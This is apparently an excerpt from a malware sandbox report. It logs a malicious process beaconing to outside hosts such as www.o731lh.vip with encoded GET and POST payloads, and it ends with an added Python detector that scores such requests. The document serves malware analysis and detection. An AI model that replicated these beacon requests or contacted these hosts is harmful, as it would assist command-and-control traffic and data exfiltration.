                                                                                                      Data Raw: 32 64 31 62 0d 0a f0 d7 2d 8a aa da 0f 11 51 d4 87 00 8d 94 85 f3 f7 47 c8 30 f7 ff fe 52 ff ff db fc 7c ed a8 eb d8 d0 22 21 f0 18 1c 7c a6 31 b7 c3 74 ef 6b b2 b2 64 d8 d8 6a 84 a4 27 09 63 1f ea 3f 5b f5 7a b6 2f a7 57 c6 49 5a 63 89 af a7 0d 50 67 fb 4b b6 75 e2 53 56 81 04 a8 06 10 16 30 4d a7 ab ff 7f 7f 69 96 8b 76 b0 db a6 0b 75 84 8e e4 54 e9 a1 c2 0a ab 6c 75 ef 7b ef 9c fc 81 62 04 c5 08 8a 91 14 30 15 92 ed 42 86 fb ee 83 ff e7 0f 78 04 5e c9 8c 2b c9 44 85 36 f6 02 61 9b 32 b5 e3 d5 02 50 15 68 6a 85 47 bb c1 2e 65 8a 12 1f c3 b4 66 fb db f5 de 04 11 11 15 91 bc 0f 99 99 b6 b5 eb 3a 7e 78 86 00 89 59 92 80 9e 8d 12 30 f7 2e ba 3b 86 4e 1d bd ea d0 15 41 4d 3f be 5f c7 41 df d3 e2 c2 f5 51 38 8f a1 22 39 9f 1f e5 81 14 96 08 21 47 6e 45 3d af 8a ba 22 85 0d bd 77 a3 be 16 0a ab 1c 17 7d 5b 68 e6 cc de 04 3f fb 38 de ac 13 67 2a 3b 71 40 ba 59 f5 c1 38 94 e7 a3 18 cc 02 3f 9c 20 83 c2 dd 1b 71 40 d0 26 c0 01 b2 de fe e9 8b 4d 91 e7 5b 38 86 60 7d 99 65 01 3b 2b 42 d7 37 d2 4b 2d 79 ce b6 [TRUNCATED]
                                                                                                      Data Ascii: 2d1b-QG0R|"!|1tkdj'c?[z/WIZcPgKuSV0MivuTlu{b0Bx^+D6a2PhjG.ef:~xY0.;NAM?_AQ8"9!GnE="w}[h?8g*;q@Y8? q@&M[8`}e;+B7K-yOv;%38TZB}Ax=ZitssmoeYdgu'PFi.:?4XWCN2>dg3*M62/C/gl]CFR@JrCJ3O6:.$I9Zf"g>d@!gBw:T(<NjBWzF}6\+ `^f?T'I80Oq;1&cpk"nLa^qrz^>'<?vIz?'A8$RnW~^cRN}-abY-IxV_Yr*IRxqHym"5Q0/~tN\bd
                                                                                                      Oct 8, 2024 15:56:35.789275885 CEST | 224 | IN | Data Raw: 07 0c 7f 76 e2 80 bf 88 20 d0 3f 44 b1 46 04 91 a4 ae 8a e9 3a 4b 57 45 4a 91 6a 66 2a 02 bb 70 03 fa 5a 41 2d 98 86 66 ef 64 00 ab aa 72 5f c2 e3 35 61 f2 e4 fe ba f9 41 86 fa 18 87 64 ac 85 47 d2 2a 71 20 65 e0 7b 43 c7 98 92 87 be d9 cc eb 87
                                                                                                      Data Ascii: v ?DF:KWEJjf*pZA-fdr_5aAdG*q e{CiC"o/Vb=8$M+,FDhitpv7zg,S^@ps\LyY"nIZvob{x>b9?=I8pcCn
                                                                                                      Oct 8, 2024 15:56:35.789288044 CEST | 1236 | IN | Data Raw: 70 b1 68 5a f8 6c dc 33 ba df 95 d9 0b f5 be 36 16 a7 53 8f aa 05 a9 7d 10 ba 06 db ef f7 1a 07 78 dd b6 97 78 21 f8 59 76 4f 55 3c e7 3c cd 97 3c 29 a5 ce 91 20 c2 3d 37 49 52 51 39 76 dc c8 3f ab 3a e0 39 c4 a4 68 48 3a 0e 52 a9 77 28 9a df 1c
                                                                                                      Data Ascii: phZl36S}xx!YvOU<<<) =7IRQ9v?:9hH:Rw(:KyIjXcI*Xkts?:)IkRB5WQ?d4_H15IB5cJ6L(IyWW`dG"\Y8Iil*2_'d*3S<HQCy9
                                                                                                      Oct 8, 2024 15:56:35.789299011 CEST | 224 | IN | Data Raw: 17 54 62 32 80 3b b2 77 3a 55 0d 05 51 55 51 dc aa 61 7e ab 8a f9 ad 1a 16 b7 aa 58 dc aa 61 79 ab 8a e5 ad 1a 56 b7 2a 58 dd 9e 9e d1 99 20 02 96 f9 86 37 78 b8 46 d1 64 32 99 b4 d3 0b 0b 1f d0 49 ff 5c 1e b9 47 30 c2 a4 26 75 6d 1b cc 66 db b9
                                                                                                      Data Ascii: Tb2;w:UQUQa~XayV*X 7xFd2I\G0&umf9[:BG*5KZ&_hvQ%ZIKxvvViV-j>zY`-[VSj<i&Y1^OE~kpo.
                                                                                                      Oct 8, 2024 15:56:35.789336920 CEST | 1236 | IN | Data Raw: 7a 0d 4b b6 5e bf 4f a3 39 2b f2 79 c9 45 e0 4b fc 83 6d 16 c5 a7 5b 76 bb 39 6e 58 be 2a 5e 3e 90 e7 74 c9 d6 d0 3a cf 81 b0 f7 fa c4 56 9b c5 b1 e1 ff 66 e9 95 1a 68 00 f5 3e 2e 10 39 35 74 f6 12 fe 90 0d 9e 32 bd fc 8c c2 35 8c 49 42 bd 3e 27
                                                                                                      Data Ascii: zK^O9+yEKm[v9nX*^>t:Vfh>.95t25IB>'mtN&`@l(fbg%@/h-V5Vx^ ^f@V6dT3RG[Q#Noncz\1Z`{'vKHObayu&=2*
                                                                                                      Oct 8, 2024 15:56:35.789371014 CEST | 1236 | IN | Data Raw: a2 a7 cc 08 2d 66 4d 85 19 d8 fc 9a 28 d9 57 26 b1 54 3c 8e 6f 05 b9 6c 58 45 80 fc b1 10 31 4f 98 42 63 80 27 c4 4e 49 e7 bb bb e2 35 95 f4 ef 51 04 97 28 73 66 fe e0 45 ac 1c cc 7c 62 91 6e a0 27 2f d7 4e 8b da 36 38 9a 95 c1 dc 0c 61 1a 56 80
                                                                                                      Data Ascii: -fM(W&T<olXE1OBc'NI5Q(sfE|bn'/N68aVI_jl?n9M!dP(GJ5VY^B,DX|MfDv6X;,4\M&.|(3N n)tjg|6!G3e b{'sg01
                                                                                                      Oct 8, 2024 15:56:35.789383888 CEST | 1236 | IN | Data Raw: 4f 51 c3 d0 58 68 3e a0 49 25 74 0a 2a 19 bb 0a 4a 39 0b 05 ff c3 02 4e aa ec 89 a8 55 8f 81 bb 85 c2 b5 6d dd 49 b4 e0 1f 97 b3 50 f4 7f 58 44 fd 3c b0 ba 29 b0 35 2e 6f 16 8a be aa bd ab 48 c4 3e c3 98 c8 c1 5b 28 ba 5e 04 11 60 e7 9c 8e 39 2e
                                                                                                      Data Ascii: OQXh>I%t*J9NUmIPXD<)5.oH>[(^`9.xDe:eq-}A]C5BQku,l/x1t-uw!GBCg[qo;`fY(P0H#:]t}N1.-6(W;L
                                                                                                      Oct 8, 2024 15:56:35.789422035 CEST | 1236 | IN | Data Raw: 17 70 c0 ed b7 e8 c3 d7 12 28 ea 4b ba 22 8d c4 1f d4 26 7f 27 f0 80 1c f0 2b 78 50 c2 b6 4a c0 a1 ac 63 83 07 ac ab b0 c4 9e d6 55 a0 45 54 d9 9c 92 aa af e0 1a c9 35 14 ea 0b 6e bf 51 ad 68 22 57 18 42 15 a9 14 be 6e 94 08 5c 37 ca e9 09 90 f4
                                                                                                      Data Ascii: p(K"&'+xPJcUET5nQh"WBn\7NkNDa,1M2JrVrGJa=GMEoT!S9 4}g;,1DuX6u9+!`/8Txxq99*q,\d904g
                                                                                                      Oct 8, 2024 15:56:35.789433956 CEST | 1236 | IN | Data Raw: 39 78 76 dc 14 b9 78 c8 de 39 e4 ed a1 91 e3 90 e3 87 0a dd a1 1c 10 9a 0f a5 77 a5 83 d0 7d 71 a0 a3 0a e4 b7 6d 7e 1b da 13 82 b1 84 bf a8 c5 9b 43 a9 23 ec 6f fb b2 48 d8 b3 7d 09 25 ec d9 b6 dc 42 1b ba ca f1 68 1f f2 54 5e f1 ed 01 0b c8 94
                                                                                                      Data Ascii: 9xvx9w}qm~C#oH}%BhT^OrgweX%+&NG|d(?tLq-o)}&+|RK97d{7"Ktpg-a};B!l,)t!%YZ+2_rosGrIm
                                                                                                      Oct 8, 2024 15:56:35.789444923 CEST | 1236 | IN | Data Raw: ad 7b dd c9 4a a9 d6 37 4e 05 2e 61 50 06 43 1c e0 aa 1a 8b 43 ae fa 92 d5 c9 4b 6d 8b 6d 6f 71 d5 c2 fd 83 af bf fa aa bc db a4 aa 08 b5 44 63 79 39 cb 43 25 70 c5 cf a0 69 a9 6f 70 4b 4c 64 be 0b d5 b7 14 8d 0c 86 c9 e6 f6 ac 42 1a 33 a1 96 12
                                                                                                      Data Ascii: {J7N.aPCCKmmoqDcy9C%piopKLdB3Je@/&(qPP"&8*#LYsSh@/-]AplQvH,5D`@gx(WoB4b|<i1$xQ[RVHOX&3MJk 6y7Jj!
                                                                                                      Oct 8, 2024 15:56:35.794358969 CEST | 1236 | IN | Data Raw: 15 59 b3 a5 ad db d1 dc 5e ec 6c ce 96 15 54 c6 45 09 f9 cb ac cc 9f 0e 3b 93 bf 31 35 32 66 76 4e c1 92 03 20 50 93 1a 59 67 1a a1 68 1e 40 b0 93 66 28 95 4e 87 8d 2e c1 58 d4 15 f1 41 04 64 d2 07 d1 3a 2d 6a e2 70 cf 4b 4f 3b d4 fd ab bc 1a 28
                                                                                                      Data Ascii: Y^lTE;152fvN PYgh@f(N.XAd:-jpKO;(gRAuB^s'/4}4G?c\G(uftKPjN{E=|pF!l&)\9$"8_~V"HpcI,JOME99iNsb9XA


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      24 | 192.168.2.11 | 50005 | 103.21.221.48 | 80 | 3000 | C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Oct 8, 2024 15:56:37.154119015 CEST | 470 | OUT | GET /abla/?gP=R9BPGtjeoV0CDxCBeHwugo2BsPFWgaNdCqs+EeARQOkoA/Qwpt/BQ4HKq3lGg5eAXthSBpGiRyb49E6pfVOIP+nYbA/MCobApDN+18WI9d8e3Vo/1w2CbZc=&-L=kBMxZFRpAD6P HTTP/1.1
                                                                                                      Host: www.tempatmudisini01.click
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Oct 8, 2024 15:56:38.338138103 CEST | 525 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                      Connection: close
                                                                                                      x-powered-by: PHP/7.4.33
                                                                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                                                                      content-type: text/html; charset=UTF-8
                                                                                                      x-redirect-by: WordPress
                                                                                                      location: http://tempatmudisini01.click/abla/?gP=R9BPGtjeoV0CDxCBeHwugo2BsPFWgaNdCqs+EeARQOkoA/Qwpt/BQ4HKq3lGg5eAXthSBpGiRyb49E6pfVOIP+nYbA/MCobApDN+18WI9d8e3Vo/1w2CbZc=&-L=kBMxZFRpAD6P
                                                                                                      x-litespeed-cache: miss
                                                                                                      content-length: 0
                                                                                                      date: Tue, 08 Oct 2024 13:56:38 GMT
                                                                                                      server: LiteSpeed


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      25 | 192.168.2.11 | 50006 | 3.33.130.190 | 80 | 3000 | C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Oct 8, 2024 15:56:43.394007921 CEST | 718 | OUT | POST /xweg/ HTTP/1.1
                                                                                                      Host: www.o731lh.vip
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Content-Length: 199
                                                                                                      Origin: http://www.o731lh.vip
                                                                                                      Referer: http://www.o731lh.vip/xweg/
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Data Raw: 67 50 3d 2b 77 75 41 44 37 4d 73 48 43 35 63 6c 53 6c 6d 61 65 32 57 37 49 64 2f 61 76 50 34 2b 64 6f 63 57 52 39 78 6d 7a 2b 6f 75 35 58 58 6e 36 4a 6a 4d 73 62 68 5a 41 45 46 4b 64 2f 34 74 2f 54 75 75 67 61 6c 64 77 31 5a 6a 71 4c 2f 54 67 71 4b 4b 51 4a 76 59 39 45 34 36 41 36 6c 67 55 38 37 75 48 50 44 77 38 2b 70 63 6f 68 49 43 69 78 54 32 61 50 52 76 41 53 47 47 54 6f 62 61 44 77 7a 4c 64 6f 78 57 64 64 5a 66 53 6e 37 78 30 2b 4b 59 33 44 47 33 53 2f 62 37 67 47 56 72 48 43 68 6f 43 52 6e 71 61 59 33 38 36 4b 52 75 67 5a 37 65 4a 55 51 6b 50 78 73 4f 49 41 54 30 37 38 35 65 41 3d 3d
                                                                                                      Data Ascii: gP=+wuAD7MsHC5clSlmae2W7Id/avP4+docWR9xmz+ou5XXn6JjMsbhZAEFKd/4t/Tuugaldw1ZjqL/TgqKKQJvY9E46A6lgU87uHPDw8+pcohICixT2aPRvASGGTobaDwzLdoxWddZfSn7x0+KY3DG3S/b7gGVrHChoCRnqaY386KRugZ7eJUQkPxsOIAT0785eA==


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      26 | 192.168.2.11 | 50007 | 3.33.130.190 | 80 | 3000 | C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Oct 8, 2024 15:56:45.958532095 CEST | 738 | OUT | POST /xweg/ HTTP/1.1
                                                                                                      Host: www.o731lh.vip
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Content-Length: 219
                                                                                                      Origin: http://www.o731lh.vip
                                                                                                      Referer: http://www.o731lh.vip/xweg/
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Data Raw: 67 50 3d 2b 77 75 41 44 37 4d 73 48 43 35 63 6b 7a 56 6d 5a 39 75 57 73 34 64 34 47 2f 50 34 33 39 70 56 57 52 68 78 6d 79 72 74 75 4b 7a 58 6e 66 74 6a 4e 74 62 68 4a 51 45 46 54 74 2f 39 77 50 54 54 75 67 57 62 64 79 52 5a 6a 71 50 2f 54 6b 75 4b 4c 6e 39 73 5a 74 45 41 32 67 36 6e 39 45 38 37 75 48 50 44 77 38 71 50 63 72 52 49 44 53 68 54 77 2f 6a 57 6d 67 53 5a 57 44 6f 62 4d 7a 78 36 4c 64 6f 54 57 63 42 7a 66 52 66 37 78 77 36 4b 57 46 72 48 38 53 2f 52 6d 77 48 4e 71 55 37 54 6a 7a 49 57 71 37 6f 6b 30 71 53 46 69 47 49 68 4f 71 64 48 6e 63 35 75 61 75 68 6a 39 4b 5a 77 46 4b 54 32 6b 4d 2b 6a 43 75 76 61 39 4b 70 4d 6a 61 6f 66 44 50 73 3d
                                                                                                      Data Ascii: gP=+wuAD7MsHC5ckzVmZ9uWs4d4G/P439pVWRhxmyrtuKzXnftjNtbhJQEFTt/9wPTTugWbdyRZjqP/TkuKLn9sZtEA2g6n9E87uHPDw8qPcrRIDShTw/jWmgSZWDobMzx6LdoTWcBzfRf7xw6KWFrH8S/RmwHNqU7TjzIWq7ok0qSFiGIhOqdHnc5uauhj9KZwFKT2kM+jCuva9KpMjaofDPs=


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      27 | 192.168.2.11 | 50008 | 3.33.130.190 | 80 | 3000 | C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Oct 8, 2024 15:56:48.516735077 CEST | 1751 | OUT | POST /xweg/ HTTP/1.1
                                                                                                      Host: www.o731lh.vip
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Content-Length: 1231
                                                                                                      Origin: http://www.o731lh.vip
                                                                                                      Referer: http://www.o731lh.vip/xweg/
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Data Raw: 67 50 3d 2b 77 75 41 44 37 4d 73 48 43 35 63 6b 7a 56 6d 5a 39 75 57 73 34 64 34 47 2f 50 34 33 39 70 56 57 52 68 78 6d 79 72 74 75 4b 37 58 6d 70 78 6a 50 4f 7a 68 4b 51 45 46 4d 64 2f 38 77 50 54 43 75 67 65 66 64 79 64 76 6a 73 54 2f 54 48 6d 4b 44 79 52 73 54 74 45 41 2b 41 36 6b 67 55 39 76 75 48 66 66 77 38 36 50 63 72 52 49 44 58 6c 54 77 71 50 57 71 41 53 47 47 54 70 4a 61 44 77 66 4c 64 77 70 57 63 46 4a 66 67 2f 37 77 51 71 4b 55 32 44 48 2f 79 2f 66 6e 77 48 65 71 56 48 49 6a 7a 6c 70 71 37 64 44 30 6f 43 46 7a 77 56 46 52 5a 35 37 36 74 64 45 45 73 56 6c 67 34 4a 31 4e 61 54 43 75 2b 57 32 61 35 6e 54 32 49 6f 37 78 61 49 75 64 76 44 45 57 71 6f 33 68 54 56 54 70 64 45 5a 73 48 63 2b 38 53 32 57 51 43 39 54 50 41 77 39 51 45 30 48 71 6b 2f 4f 4f 57 2f 35 4c 33 50 6f 43 30 4f 41 4e 5a 34 4c 2f 50 55 6a 45 6e 37 2f 72 4a 48 52 57 65 43 49 76 4a 33 4d 56 43 38 58 58 71 66 47 75 67 4c 6f 56 4c 4e 67 68 55 72 76 66 4e 44 53 43 32 58 6d 51 32 70 73 35 73 6b 75 30 2f 4e 65 77 6b 31 75 77 75 2b [TRUNCATED]
                                                                                                      Data Ascii: gP=+wuAD7MsHC5ckzVmZ9uWs4d4G/P439pVWRhxmyrtuK7XmpxjPOzhKQEFMd/8wPTCugefdydvjsT/THmKDyRsTtEA+A6kgU9vuHffw86PcrRIDXlTwqPWqASGGTpJaDwfLdwpWcFJfg/7wQqKU2DH/y/fnwHeqVHIjzlpq7dD0oCFzwVFRZ576tdEEsVlg4J1NaTCu+W2a5nT2Io7xaIudvDEWqo3hTVTpdEZsHc+8S2WQC9TPAw9QE0Hqk/OOW/5L3PoC0OANZ4L/PUjEn7/rJHRWeCIvJ3MVC8XXqfGugLoVLNghUrvfNDSC2XmQ2ps5sku0/Newk1uwu+mL/qVW5iCgVWhFNXshhQ0kL3Guo3+SAOFPWimTO86+LVEwc0kfVORL4lU1IlJjwfBdTvYlyngxVmG3vgBXHDs4mPdr9b6voJtBUpRvFYCWxoN7qvJi6T893CuRnwHQUaXDJqR61QdWumIcsMjIlCJ7zVQMIrvWReBPkHZDWdosYdIgS57h8LE8QjnL1bNLmrxgdMJBsgHuxI253PYECmZqyb/B0P+Xk1ELLKdo3ScxWgUJPljR402mxwYWPsQgR6iv1r3AW8gWMIbRSgv/TlcmFI/K4xqBc8yZj9yz2cxnxzQvfFSUIUeOcABhZtLzl7C46BGOBtMoIYsDY1AH9Jle0PAP19PkbN0+3CGEhqvJn1SWENb9D8bCsue3benX8ZcnsUiHLmaxIS/gInKyUC2a7x8xmRGa4Dy24wZMVrtX5+4HgRPAPR2Ve3YWFHAWLd/1+gY1vgpDvtCG8TIy6lh2zpw/hoQUkXfUizpp7JKWeB6FbyfUy9+llazNIwq+N3mITTn0FNqtk00k/LalKtBGp7qg6zdcoAXzoxloCefRm4sr47KLLL5V4HzJio/QjvQ6H+BZD2TPoSdyC7p18+Fxqm8kAR1oWerjLIOVmQUoQbSoiUgbfaO3KI5PQWRTDWEcTzuxDJlbqHpozC+7iaC6LX80sSVKSKQj [TRUNCATED]


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      28 | 192.168.2.11 | 50009 | 3.33.130.190 | 80 | 3000 | C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Oct 8, 2024 15:56:51.051431894 CEST | 458 | OUT | GET /xweg/?-L=kBMxZFRpAD6P&gP=zyGgAOIUWHAkjy53XOab1MtcQdyBzOoJaxZIhC+JlO6DnbZYVfn3Wlg6Cuq4vonK+0ubeBxTnsDOaX+bBTk8d8gi4CXplyUvpH+a6MWSZKg7Sn8a+cnOgQs= HTTP/1.1
                                                                                                      Host: www.o731lh.vip
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Oct 8, 2024 15:56:51.500041008 CEST | 394 | IN | HTTP/1.1 200 OK
                                                                                                      Server: openresty
                                                                                                      Date: Tue, 08 Oct 2024 13:56:51 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 254
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 2d 4c 3d 6b 42 4d 78 5a 46 52 70 41 44 36 50 26 67 50 3d 7a 79 47 67 41 4f 49 55 57 48 41 6b 6a 79 35 33 58 4f 61 62 31 4d 74 63 51 64 79 42 7a 4f 6f 4a 61 78 5a 49 68 43 2b 4a 6c 4f 36 44 6e 62 5a 59 56 66 6e 33 57 6c 67 36 43 75 71 34 76 6f 6e 4b 2b 30 75 62 65 42 78 54 6e 73 44 4f 61 58 2b 62 42 54 6b 38 64 38 67 69 34 43 58 70 6c 79 55 76 70 48 2b 61 36 4d 57 53 5a 4b 67 37 53 6e 38 61 2b 63 6e 4f 67 51 73 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?-L=kBMxZFRpAD6P&gP=zyGgAOIUWHAkjy53XOab1MtcQdyBzOoJaxZIhC+JlO6DnbZYVfn3Wlg6Cuq4vonK+0ubeBxTnsDOaX+bBTk8d8gi4CXplyUvpH+a6MWSZKg7Sn8a+cnOgQs="}</script></head></html>

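The requests in sessions 24 to 28 above share one shape: a GET whose query carries a long base64-looking value in one parameter plus a short -L= token, followed by form-encoded POSTs whose body is a single gP= parameter with a similar blob, all sent with the same Mac OS X 10_10_4 / Chrome 42 User-Agent, Connection: close, and a short lowercase directory path (/abla/, /xweg/, /2ho9/) on a rotating set of hosts. The Python below is an added example, not part of the Joe Sandbox report and not a vendor or Suricata signature: it parses raw HTTP requests of that form and scores each one against those indicators, then lists the hosts whose traffic matches consistently. The sample requests are constructed from sessions 24, 25 and 29 on this page, with one benign control request (www.example.com, a Firefox User-Agent) that is this example's own; the function names, regular expressions and the 40-character and three-indicator thresholds are assumptions chosen for the example.

```python
"""Added example (not from the Joe Sandbox report): parse HTTP requests of the
shape recorded above and score them for beacon-like indicators.
Sample inputs are constructed from the sessions on this page; names, regexes
and thresholds are this example's assumptions, not vendor signatures."""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass

# User-Agent string exactly as sent in the captured sessions above.
CAPTURED_UA = ("Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 "
               "(KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36")
# Heuristics (assumptions): base64 alphabet with optional padding, and a short
# lowercase directory path such as /abla/, /xweg/, /2ho9/ as seen above.
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
SHORT_PATH_RE = re.compile(r"^/[a-z0-9]{3,6}/$")
MIN_BLOB_LEN = 40  # assumption: shorter values are treated as ordinary parameters


@dataclass
class Request:
    method: str
    path: str
    query: dict[str, str]
    headers: dict[str, str]
    body: str

    @property
    def host(self) -> str:
        return self.headers.get("host", "")


def _form_params(encoded: str) -> dict[str, str]:
    """Split 'a=b&c=d' into a dict. Only the first '=' separates key from value,
    so base64 padding inside a value survives; values are kept as sent."""
    return dict(kv.split("=", 1) for kv in encoded.split("&") if "=" in kv)


def parse_request(raw: str) -> Request:
    """Parse a raw HTTP/1.1 request (CRLF line endings) into a Request."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    path, _, query_string = target.partition("?")
    headers: dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return Request(method, path, _form_params(query_string), headers, body.strip())


def beacon_indicators(req: Request) -> list[str]:
    """Return the indicator names this request matches, in a fixed order."""
    hits: list[str] = []
    if req.headers.get("user-agent") == CAPTURED_UA:
        hits.append("captured_mac_chrome42_ua")
    if SHORT_PATH_RE.match(req.path):
        hits.append("short_random_path")
    if req.method == "GET":
        blobs = [v for v in req.query.values()
                 if len(v) >= MIN_BLOB_LEN and B64_RE.match(v)]
        if blobs:
            hits.append("b64_blob_in_query")
    elif req.method == "POST":
        params = _form_params(req.body)
        blobs = [v for v in params.values()
                 if len(v) >= MIN_BLOB_LEN and B64_RE.match(v)]
        if len(params) == 1 and blobs:
            hits.append("single_b64_param_body")
    return hits


def beaconing_hosts(requests: list[Request], min_hits: int = 3) -> list[str]:
    """Hosts for which every observed request reaches min_hits indicators."""
    per_host: dict[str, list[bool]] = defaultdict(list)
    for req in requests:
        per_host[req.host].append(len(beacon_indicators(req)) >= min_hits)
    return sorted(host for host, flags in per_host.items() if all(flags))


def sample_requests() -> list[Request]:
    """Constructed from sessions 24, 25 and 29 above, plus one benign control
    request (www.example.com, Firefox User-Agent) that is not from the page."""
    ua = "User-Agent: " + CAPTURED_UA + "\r\n"
    raw = [
        "GET /abla/?gP=R9BPGtjeoV0CDxCBeHwugo2BsPFWgaNdCqs+EeARQOkoA/Qwpt/BQ4HKq3lGg5eAXthSBpGiRyb49E6pfVOIP+nYbA/MCobApDN+18WI9d8e3Vo/1w2CbZc=&-L=kBMxZFRpAD6P HTTP/1.1\r\n"
        "Host: www.tempatmudisini01.click\r\n" + ua + "Connection: close\r\n\r\n",
        "POST /xweg/ HTTP/1.1\r\nHost: www.o731lh.vip\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n" + ua + "\r\n"
        "gP=+wuAD7MsHC5clSlmae2W7Id/avP4+docWR9xmz+ou5XXn6JjMsbhZAEFKd/4t/Tuugaldw1ZjqL/TgqKKQJvY9E46A6lgU87uHPDw8+pcohICixT2aPRvASGGTobaDwzLdoxWddZfSn7x0+KY3DG3S/b7gGVrHChoCRnqaY386KRugZ7eJUQkPxsOIAT0785eA==",
        "POST /2ho9/ HTTP/1.1\r\nHost: www.consultarfacil.online\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n" + ua + "\r\n"
        "gP=hbrIhRUnKXpFG9sPLTcbReCRym77pQ0e3y+nnO7ZoucpBuih2S6ZVwL2jT0leZ+vO376bnDP4whmbK2/z57LDaayJaxbHfgagvm8JwagwU46ga1sdhc8z6bzYLG9t3jAQdVF1mDuzbLrEaqAtmJdwuM9nIdk3VLm3o980zGp6vxu8JrbHOvbOAISotYhdEQI+g==",
        "GET /index.html?q=hello HTTP/1.1\r\nHost: www.example.com\r\n"
        "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) "
        "Gecko/20100101 Firefox/130.0\r\n\r\n",
    ]
    return [parse_request(r) for r in raw]


if __name__ == "__main__":
    for req in sample_requests():
        print(req.method, req.host, req.path, beacon_indicators(req))
    print("beaconing hosts:", beaconing_hosts(sample_requests()))
```

Each indicator on its own is weak (an old Chrome-on-Mac User-Agent or a short path occurs in legitimate traffic), which is why the host-level check requires all three on every request from a host before it reports it; in a real deployment the same scoring would run over proxy or Zeek http.log records rather than raw request strings, and the host list would be cross-checked against the DNS answers recorded earlier in the report.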

